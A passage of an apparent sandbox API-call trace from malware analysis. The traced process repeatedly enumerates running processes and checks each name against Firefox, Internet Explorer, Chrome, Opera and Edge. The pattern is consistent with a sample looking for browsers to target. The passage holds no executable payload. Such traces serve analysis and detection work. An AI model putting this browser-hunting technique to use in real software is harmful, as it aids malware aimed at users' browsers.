th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0163.649] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0163.649] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0163.649] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0163.649] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0163.649] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.649] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0163.649] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0163.649] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0163.649] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0163.649] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0163.649] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.650] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0163.650] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0163.650] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0163.650] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0163.650] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0163.650] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.650] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0163.651] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0163.651] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0163.651] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0163.651] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0163.651] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.651] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0163.651] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0163.651] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0163.651] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0163.651] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0163.651] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.651] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0163.652] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0163.652] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0163.652] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0163.652] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0163.652] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.652] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0163.653] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0163.653] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0163.653] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0163.653] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0163.653] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.653] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.653] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0163.653] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0163.653] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0163.654] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0163.654] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.654] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.654] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.654] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.654] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.654] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.654] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.654] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.655] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0163.655] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0163.655] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0163.655] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0163.655] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.655] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.656] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.656] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.656] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.656] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.656] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.656] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0163.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0163.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0163.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0163.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.656] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.657] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.657] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.657] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.657] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.657] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.657] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.658] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.658] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.658] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.658] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0163.658] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.658] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.658] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0163.658] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0163.658] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0163.658] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0163.658] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.658] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0163.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0163.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0163.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0163.754] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.754] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.755] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.755] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.755] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.755] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0163.755] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.755] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.755] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.755] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.756] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.756] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0163.756] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.756] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.756] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.756] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.756] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.756] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0163.756] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.756] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.757] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0163.757] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0163.757] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0163.757] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0163.757] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.757] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0163.757] CloseHandle (hObject=0xe8) returned 1 [0163.758] Sleep (dwMilliseconds=0x3e8) [0165.401] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0165.403] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.403] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0165.404] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0165.404] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0165.404] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0165.404] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0165.404] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0165.404] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0165.404] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0165.404] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0165.404] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0165.404] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0165.404] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0165.405] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0165.405] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0165.405] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0165.405] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0165.405] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.405] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.405] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0165.405] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0165.405] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0165.405] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0165.406] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0165.406] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0165.406] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0165.406] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0165.406] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0165.406] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.407] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0165.407] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0165.407] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0165.407] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0165.407] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.407] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0165.407] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0165.407] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0165.407] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0165.407] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0165.407] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.408] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0165.408] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0165.408] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0165.408] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0165.408] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0165.408] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.408] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0165.409] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0165.409] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0165.409] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0165.409] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0165.409] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.409] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0165.409] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0165.409] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0165.409] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0165.409] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0165.409] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.409] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.410] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.410] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.410] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.410] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.410] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.410] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.410] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.411] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.411] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.411] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.412] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.412] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.412] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.412] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.412] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.412] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0165.412] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0165.412] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0165.413] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0165.413] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0165.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0165.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0165.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0165.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0165.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.414] lstrcmpiA 